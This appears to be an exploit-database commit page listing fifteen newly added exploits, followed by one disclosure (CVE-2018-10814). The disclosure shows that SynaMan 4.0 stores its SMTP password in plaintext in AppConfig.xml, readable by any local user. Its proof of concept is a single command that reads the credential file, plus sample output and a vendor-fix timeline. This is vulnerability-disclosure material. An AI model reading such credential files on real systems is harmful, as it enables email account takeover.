b42759b8b8
15 changes to exploits/shellcodes jiNa OCR Image to Text 1.0 - Denial of Service (PoC) PixGPS 1.1.8 - Denial of Service (PoC) RoboImport 1.2.0.72 - Denial of Service (PoC) PicaJet FX 2.6.5 - Denial of Service (PoC) iCash 7.6.5 - Denial of Service (PoC) PDF Explorer 1.5.66.2 - Denial of Service (PoC) Infiltrator Network Security Scanner 4.6 - Denial of Service (PoC) Apple macOS 10.13.4 - Denial of Service (PoC) CirCarLife SCADA 4.3.0 - Credential Disclosure Rubedo CMS 3.4.0 - Directory Traversal SynaMan 4.0 build 1488 - Authenticated Cross-Site Scripting (XSS) SynaMan 4.0 build 1488 - SMTP Credential Disclosure IBM Identity Governance and Intelligence 5.2.3.2 / 5.2.4 - SQL Injection MyBB 1.8.17 - Cross-Site Scripting LG Smart IP Camera 1508190 - Backup File Download
45 lines
No EOL
1.9 KiB
Text
45 lines
No EOL
1.9 KiB
Text
# Exploit Author: bzyo
|
|
# CVE: CVE-2018-10814
|
|
# Twitter: @bzyo_
|
|
# Exploit Title: SynaMan 4.0 - Cleartext password SMTP settings
|
|
# Date: 09-12-18
|
|
# Vulnerable Software: SynaMan 4.0 build 1488
|
|
# Vendor Homepage: http://web.synametrics.com/SynaMan.htm
|
|
# Version: 4.0 build 1488
|
|
# Software Link: http://web.synametrics.com/SynaManDownload.htm
|
|
# Tested On: Windows 7 x86
|
|
|
|
Description
|
|
-----------------------------------------------------------------
|
|
SynaMan 4.0 suffers from cleartext password storage for SMTP settings which would allow email account compromise
|
|
|
|
Prerequisites
|
|
-----------------------------------------------------------------
|
|
Access to a system running Synaman 4 using a low-privileged user account
|
|
|
|
Proof of Concept
|
|
-----------------------------------------------------------------
|
|
The password for the smtp email account is stored in plaintext in the AppConfig.xml configuration file. This file can be viewed by any local user of the system.
|
|
|
|
C:\SynaMan\config>type AppConfig.xml
|
|
<?xml version="1.0" encoding="UTF-8"?>
|
|
<Configuration>
|
|
<parameters>
|
|
<parameter name="hasLoggedInOnce" type="4" value="true"></parameter>
|
|
<parameter name="adminEmail" type="1" value="test@gmail.com"></parameter>
|
|
<parameter name="smtpSecurity" type="1" value="None"></parameter>
|
|
**truncated**
|
|
<parameter name="smtpPassword" type="1" value="SuperSecret!"></parameter>
|
|
<parameter name="ntServiceCommand" type="1" value="net start SynaMan"></parameter>
|
|
<parameter name="mimicHtmlFiles" type="4" value="false"></parameter>
|
|
</parameters>
|
|
</Configuration>
|
|
|
|
|
|
|
|
Timeline
|
|
---------------------------------------------------------------------
|
|
05-07-18: Vendor notified of vulnerabilities
|
|
05-08-18: Vendor responded and will fix
|
|
07-25-18: Vendor fixed in new release
|
|
09-12-18: Submitted public disclosure |